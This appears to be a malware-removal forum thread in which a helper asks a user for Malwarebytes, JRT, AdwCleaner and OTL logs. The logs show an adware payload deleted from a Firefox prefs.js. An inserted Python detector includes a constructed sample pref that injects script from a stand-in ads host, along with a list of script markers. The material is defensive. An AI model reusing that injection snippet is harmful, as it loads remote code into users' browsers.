Please run a Quick Scan with Malwarebytes and post the log:

Open up Malwarebytes => Settings Tab => Scanner Settings => Under action for PUP > Select: Show in Results List and Check for removal.

Please Update and run a Quick Scan with Malwarebytes Anti-Malware, post the report.

Make sure that everything is checked, and click Remove Selected.


Hi Maniac,

Here's the log; it said nothing was found, although it is definitely there.

Malwarebytes Anti-Malware (PRO) 1.75.0.1300
www.malwarebytes.org
 
Database version: v2014.03.25.04
 
Windows Vista Service Pack 2 x64 NTFS
Internet Explorer 9.0.8112.16421
Alan :: ALAN-PC [administrator]
 
Protection: Enabled
 
25/03/2014 15:23:29
mbam-log-2014-03-25 (15-23-29).txt
 
Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 225516
Time elapsed: 12 minute(s), 6 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
(end)

Step 1

Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 2

Please download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on the Scan button. Wait until it is finished.
  • Click on Clean.
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner\AdwCleaner[s0].txt as well.
In your next reply, post the following log files:
  • Junkware Removal Tool log
  • AdwCleaner log

Hi, thanks for your help, here are the logs:

Junkware Removal Tool

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.3 (03.23.2014:1)
OS: Windows Vista Home Premium x64
Ran by Alan on 25/03/2014 at 17:05:24.54
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
 
 
~~~ Folders
 
 
 
~~~ FireFox
 
Successfully deleted the following from C:\Users\Alan\AppData\Roaming\mozilla\firefox\profiles\5lqwfxjt.default\prefs.js
 
user_pref("extensions.yUB.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"su
 
 
 
~~~ Event Viewer Logs were cleared
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 25/03/2014 at 17:16:01.09
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

ADW Cleaner

# AdwCleaner v3.022 - Report created 25/03/2014 at 17:42:15
# Updated 13/03/2014 by Xplode
# Operating System : Windows Vista Home Premium Service Pack 2 (64 bits)
# Username : Alan - ALAN-PC
# Running from : C:\Users\Alan\Downloads\AdwCleaner (1).exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16540
 
 
-\\ Mozilla Firefox v27.0.1 (en-US)
 
[ File : C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\prefs.js ]
 
Line Deleted : user_pref("extensions.yUB.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf[...]
 
-\\ Google Chrome v32.0.1700.107
 
[ File : C:\Users\Alan\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
 
*************************
 
AdwCleaner[R0].txt - [18089 octets] - [21/03/2014 01:18:45]
AdwCleaner[R1].txt - [1025 octets] - [21/03/2014 02:26:58]
AdwCleaner[R2].txt - [1371 octets] - [25/03/2014 17:19:27]
AdwCleaner[s0].txt - [14280 octets] - [21/03/2014 01:23:55]
AdwCleaner[s1].txt - [1087 octets] - [21/03/2014 02:34:09]
AdwCleaner[s2].txt - [1294 octets] - [25/03/2014 17:42:15]
 
########## EOF - C:\AdwCleaner\AdwCleaner[s2].txt - [1354 octets] ##########

 

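The line that both JRT and AdwCleaner deleted from prefs.js is worth a closer look: `extensions.yUB.scode` is an ordinary string preference, but its value is a JavaScript function that inspects `window.self.location.href` and reacts to certain hosts. Firefox preferences are meant to hold settings, not code, so a string pref that contains `function(` or `location.href` is a reliable sign that an adware add-on is parking its injection payload in the profile. The script below is an added example, not part of this thread and not code from JRT, AdwCleaner or Mozilla. It parses a prefs.js, flags string prefs that carry script markers or are implausibly long, and writes the file back without those lines, which is the same remediation the two tools logged above. The sample prefs.js is constructed for the example: the payload is a shortened look-alike of the one in the logs, not the actual deleted line, and the `ads.example` host and the marker list are assumptions.

```python
import re

# One Firefox preference line:  user_pref("name", value);
# The name group tolerates escaped quotes; the value is kept raw (string, int or bool).
PREF_RE = re.compile(r'^\s*user_pref\("((?:[^"\\]|\\.)*)",\s*(.*)\);\s*$')

# Substrings that belong in executable JavaScript, not in a setting (assumed list).
SCRIPT_MARKERS = ("function(", "location.href", "document.", "window.", "eval(", "<script")

# Constructed sample prefs.js (not the file from the thread): three ordinary prefs plus
# one string pref carrying a script payload in the style JRT/AdwCleaner deleted.
SAMPLE_PREFS_JS = r'''# Mozilla User Preferences
/* Do not edit this file. */
user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1395000000);
user_pref("browser.startup.homepage", "https://www.mozilla.org/");
user_pref("extensions.yUB.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1){var s=document.createElement(\"script\");s.src=\"http://ads.example/x.js\";document.body.appendChild(s);}}catch(e){}})();");
user_pref("extensions.lastAppVersion", "27.0.1");
'''


def parse_prefs(text):
    """Return [(name, raw_value)] for every user_pref line; comments and junk are skipped."""
    prefs = []
    for line in text.splitlines():
        m = PREF_RE.match(line)
        if m:
            prefs.append((m.group(1), m.group(2)))
    return prefs


def unquote_js_string(raw):
    """Strip the surrounding quotes of a JS string literal and undo backslash escapes."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        raw = raw[1:-1]
    return re.sub(r'\\(["\\/])', r'\1', raw)


def find_suspicious_prefs(text, markers=SCRIPT_MARKERS, long_threshold=500):
    """Flag string prefs whose value contains script markers or is implausibly long.

    Returns a list of dicts with the pref name, the markers hit, the value length
    and a short preview of the value.
    """
    findings = []
    for name, raw in parse_prefs(text):
        if not raw.startswith('"'):
            continue  # integers and booleans cannot carry code
        value = unquote_js_string(raw)
        hits = [m for m in markers if m in value]
        too_long = len(value) > long_threshold
        if hits or too_long:
            findings.append({
                "name": name,
                "markers": hits,
                "length": len(value),
                "preview": value[:60],
            })
    return findings


def drop_prefs(text, names):
    """Return the prefs.js text with the named user_pref lines removed."""
    keep = []
    for line in text.splitlines(True):
        m = PREF_RE.match(line)
        if m and m.group(1) in names:
            continue
        keep.append(line)
    return "".join(keep)


if __name__ == "__main__":
    hits = find_suspicious_prefs(SAMPLE_PREFS_JS)
    for f in hits:
        print("%s  len=%d  markers=%s" % (f["name"], f["length"], ",".join(f["markers"])))
        print("    %s..." % f["preview"])
    cleaned = drop_prefs(SAMPLE_PREFS_JS, {f["name"] for f in hits})
    print("%d pref lines remain after cleaning" % len(parse_prefs(cleaned)))
```

Run it against a real profile only with Firefox closed: Firefox rewrites prefs.js on exit, so a line removed while the browser is running comes straight back. Deleting the pref also removes only the payload, not whatever wrote it; the add-on that owns the `extensions.yUB.*` namespace still has to be found in the profile's extensions folder and add-on registry (extensions.json or extensions.sqlite, depending on the Firefox version), or the pref will be recreated on the next start.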

Download OTL to your Desktop

  • Double click on the icon to run it. Make sure all other windows are closed and let it run uninterrupted.
  • Please tick Scan All Users. Next, click the Quick Scan button. The scan won't take long.
  • When the scan completes, it will open two Notepad windows, OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
  • Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time, and post them in your topic.

Ok here is the OTL.txt
OTL logfile created on: 28/03/2014 16:07:42 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Alan\Desktop
64bit-Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
 
3.87 Gb Total Physical Memory | 2.41 Gb Available Physical Memory | 62.28% Memory free
7.95 Gb Paging File | 5.62 Gb Available in Paging File | 70.63% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 451.62 Gb Total Space | 247.92 Gb Free Space | 54.90% Space Free | Partition Type: NTFS
Drive D: | 14.14 Gb Total Space | 1.92 Gb Free Space | 13.55% Space Free | Partition Type: NTFS
 
Computer Name: ALAN-PC | User Name: Alan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - File not found -- 
PRC - [2014/03/28 16:05:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
PRC - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2013/04/04 14:50:32 | 000,532,040 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
PRC - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
PRC - [2007/04/18 15:01:34 | 000,065,536 | ---- | M] (Hewlett-Packard Company) -- C:\hp\support\hpsysdrv.exe
PRC - [2006/05/26 03:50:24 | 004,149,248 | ---- | M] () -- C:\Program Files (x86)\MySQL\MySQL Server 5.0\bin\mysqld-nt.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/02/13 04:04:54 | 000,998,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\c5213af29d521ee19cc55983f8c2037c\System.Management.ni.dll
MOD - [2014/02/13 04:03:05 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\e3ab5ab0fbb86c36425e6902e54a547b\System.Runtime.Remoting.ni.dll
MOD - [2014/02/13 04:03:02 | 000,627,200 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\24c666e940e61baf4d33315346a03ab6\System.Transactions.ni.dll
MOD - [2014/02/13 04:03:01 | 000,627,712 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\cbadc7af4484ceeb8092c5f2b1240f0b\System.EnterpriseServices.ni.dll
MOD - [2014/02/13 04:03:01 | 000,280,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\cbadc7af4484ceeb8092c5f2b1240f0b\System.EnterpriseServices.Wrapper.dll
MOD - [2014/02/13 04:02:53 | 000,978,944 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\d17ceca243fabda73eefb21d9bd072df\System.Configuration.ni.dll
MOD - [2014/02/13 03:49:56 | 005,462,016 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\f87e71868aedbc6c4e8fe7160d17c4ab\System.Xml.ni.dll
MOD - [2014/02/13 03:49:40 | 012,434,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d2b605fc7deda872727d1ed37710420e\System.Windows.Forms.ni.dll
MOD - [2014/02/13 03:49:31 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\8e6265a54260bddfc05951e764f5bc48\System.Drawing.ni.dll
MOD - [2014/02/13 03:49:17 | 006,622,208 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\6252b82373099322bef5f577bab408b6\System.Data.ni.dll
MOD - [2014/02/13 03:49:06 | 000,368,128 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\71e362b114f878201540696b6d66bf45\PresentationFramework.Aero.ni.dll
MOD - [2014/02/13 03:49:05 | 014,329,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\b46f1c203d1e4bec4597adf684ec1d41\PresentationFramework.ni.dll
MOD - [2014/02/13 03:48:46 | 012,218,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\07d57714fff9db216537473f4a777f22\PresentationCore.ni.dll
MOD - [2014/02/13 03:48:32 | 003,325,440 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\d981bccab40fbbdc1d35bf2a58c947b7\WindowsBase.ni.dll
MOD - [2014/02/13 03:48:28 | 007,977,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\957628d9dd7b3bf370a56dca7835a997\System.ni.dll
MOD - [2014/02/13 03:48:21 | 011,497,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\694a37a84dee2cd2609a1dfab27c0433\mscorlib.ni.dll
MOD - [2013/01/28 13:08:56 | 000,087,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2013/01/28 13:08:28 | 001,242,512 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2009/04/11 06:28:21 | 000,368,640 | ---- | M] () -- C:\WINDOWS\SysWOW64\msjetoledb40.dll
MOD - [2009/04/11 02:04:15 | 000,113,664 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
MOD - [2009/03/30 04:42:19 | 000,261,632 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
MOD - [2009/03/30 04:42:17 | 002,933,760 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
MOD - [2008/07/03 11:45:00 | 000,032,768 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Content.XmlSerializers.dll
MOD - [2008/07/03 11:42:56 | 000,007,168 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
MOD - [2008/07/03 11:42:54 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
MOD - [2008/07/03 11:42:48 | 000,114,688 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\ECLibrary.dll
MOD - [2008/07/03 11:42:46 | 000,010,240 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
MOD - [2008/07/03 11:42:40 | 000,040,960 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
MOD - [2008/07/03 11:42:40 | 000,028,672 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
MOD - [2008/07/03 11:42:40 | 000,005,632 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2012/10/21 09:36:16 | 000,121,856 | ---- | M] (ActMask Co.,Ltd - http://www.all2pdf.com)
O4:64bit: - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [HP Health Check Scheduler] c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe (Hewlett-Packard)
O4 - HKLM..\Run: [hpsysdrv] c:\hp\support\hpsysdrv.exe (Hewlett-Packard Company)
O4 - HKLM..\Run: [KBD] C:\hp\KBD\KbdStub.exe ()
O4 - HKLM..\Run: [LifeCam] C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe (Microsoft Corporation)
O4 - HKLM..\Run: [OsdMaestro] c:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD64.exe (OsdMaestro)
O4 - HKU\S-1-5-21-465606687-3642172284-1488456202-1000..\Run: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart File not found
O4 - HKLM..\RunOnce: [AvgUninstallURL] C:\Windows\SysWow64\cmd.exe (Microsoft Corporation)
O4 - HKU\.DEFAULT..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found
O4 - HKU\S-1-5-18..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found
O4 - Startup: C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O4 - Startup: C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tracker.lnk = C:\Program Files (x86)\Tracker\Tracker.exe ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\.DEFAULT\..Trusted Ranges: Range1 ([http] in Local intranet)
O15 - HKU\S-1-5-18\..Trusted Ranges: Range1 ([http] in Local intranet)
O15 - HKU\S-1-5-21-465606687-3642172284-1488456202-1000\..Trusted Ranges: Range1 ([http] in Local intranet)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0017-0000-0017-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{20DD8DB8-06EA-4D40-A3CC-B974B24382EB}: DhcpNameServer = 192.168.1.254
O18:64bit: - Protocol\Handler\grooveLocalGWS - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\WINDOWS\SysWOW64\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\WINDOWS\Web\Wallpaper\awave.jpg
O24 - Desktop BackupWallPaper: C:\WINDOWS\Web\Wallpaper\awave.jpg
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/03/28 16:06:07 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
[2014/03/28 14:59:50 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\test
[2014/03/28 13:52:14 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Futura Font
[2014/03/27 21:21:09 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Stripe-Larry-Ullman
[2014/03/27 14:10:24 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\WP Page Speed
[2014/03/26 17:54:33 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\futura
[2014/03/26 16:44:50 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\wppagespeed
[2014/03/26 13:00:55 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Alannah Optimized
[2014/03/25 17:04:26 | 001,038,974 | ---- | C] (Thisisu) -- C:\Users\Alan\Desktop\JRT (1).exe
[2014/03/25 17:00:52 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\171281
[2014/03/25 15:32:16 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\wp-whos-online
[2014/03/25 15:31:46 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\p2-likes
[2014/03/25 15:31:30 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\p2-by-email
[2014/03/24 19:00:03 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\PSDs
[2014/03/24 14:28:33 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Tax Zone Plus
[2014/03/23 21:08:31 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Sumil
[2014/03/23 20:09:56 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Epray V2
[2014/03/21 03:03:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2014/03/21 02:51:51 | 000,091,352 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/03/21 01:55:38 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2014/03/21 01:52:24 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe
[2014/03/21 01:52:24 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe
[2014/03/21 01:52:24 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe
[2014/03/21 01:52:19 | 000,000,000 | --SD | C] -- C:\ComboFix
[2014/03/21 01:51:38 | 000,000,000 | --SD | C] -- C:\32788R22FWJFW
[2014/03/21 01:49:11 | 000,000,000 | ---D | C] -- C:\Qoobox
[2014/03/21 01:48:40 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2014/03/21 01:32:49 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/03/21 01:20:44 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\VIRUS REMOVAL
[2014/03/21 01:18:41 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/03/21 00:32:16 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VS Revo Group
[2014/03/21 00:32:16 | 000,000,000 | ---D | C] -- C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
[2014/03/18 21:20:48 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Najlepsze Lokaty
[2014/03/17 00:13:07 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Free Bitcoins Online
[2014/03/15 22:10:19 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Master Resale
[2014/03/15 20:07:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Audacity
[2014/03/14 17:38:44 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2014/03/14 17:38:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2014/03/14 17:38:40 | 000,000,000 | R--D | C] -- C:\Program Files (x86)\Skype
[2014/03/13 20:56:36 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/03/13 20:54:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/03/06 12:51:58 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Undercover Tipster
[2014/03/05 14:59:04 | 000,000,000 | ---D | C] -- C:\Users\Alan\AppData\Local\Skype
[3 C:\Windows\SysWow64\*.tmp files -> C:\Windows\SysWow64\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/03/28 16:05:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
[2014/03/28 15:46:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/03/28 15:44:04 | 000,003,616 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2014/03/28 15:44:04 | 000,003,616 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2014/03/28 15:18:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/03/28 14:55:18 | 000,003,933 | ---- | M] () -- C:\Users\Alan\Desktop\terms-in-comments.php
[2014/03/28 14:01:34 | 000,365,691 | ---- | M] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.49.56 AM.png
[2014/03/28 13:52:37 | 000,216,089 | ---- | M] () -- C:\Users\Alan\Desktop\Futura Font.zip
[2014/03/28 13:15:35 | 000,533,740 | ---- | M] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.14.22 AM.png
[2014/03/28 07:46:00 | 000,000,890 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/03/27 23:29:56 | 000,000,600 | ---- | M] () -- C:\Users\Alan\AppData\Local\PUTTY.RND
[2014/03/27 23:29:08 | 000,002,804 | ---- | M] () -- C:\Users\Alan\Desktop\bg.jpg
[2014/03/27 23:23:44 | 000,025,539 | ---- | M] () -- C:\Users\Alan\Desktop\bg.png
[2014/03/27 21:18:45 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-checkout.php
[2014/03/27 19:58:58 | 000,007,276 | ---- | M] () -- C:\Users\Alan\Desktop\images.jpg
[2014/03/27 18:51:14 | 000,000,416 | ---- | M] () -- C:\Users\Alan\Desktop\close.png
[2014/03/27 18:51:08 | 000,000,715 | ---- | M] () -- C:\Users\Alan\Desktop\open.png
[2014/03/27 17:08:02 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\sidebar.php
[2014/03/27 16:21:29 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-speed-service.php
[2014/03/27 16:21:18 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-faq.php
[2014/03/27 16:21:10 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-custom-enquiry.php
[2014/03/27 16:20:54 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-contact.php
[2014/03/26 21:29:57 | 000,023,552 | ---- | M] () -- C:\Users\Alan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014/03/26 21:29:54 | 001,713,132 | ---- | M] () -- C:\Users\Alan\Desktop\salesvideo.wmv
[2014/03/26 21:10:11 | 000,012,208 | ---- | M] () -- C:\Users\Alan\Desktop\google-page-speed.png
[2014/03/26 21:08:46 | 000,232,310 | ---- | M] () -- C:\Users\Alan\Desktop\new-google-logo-knockoff.png
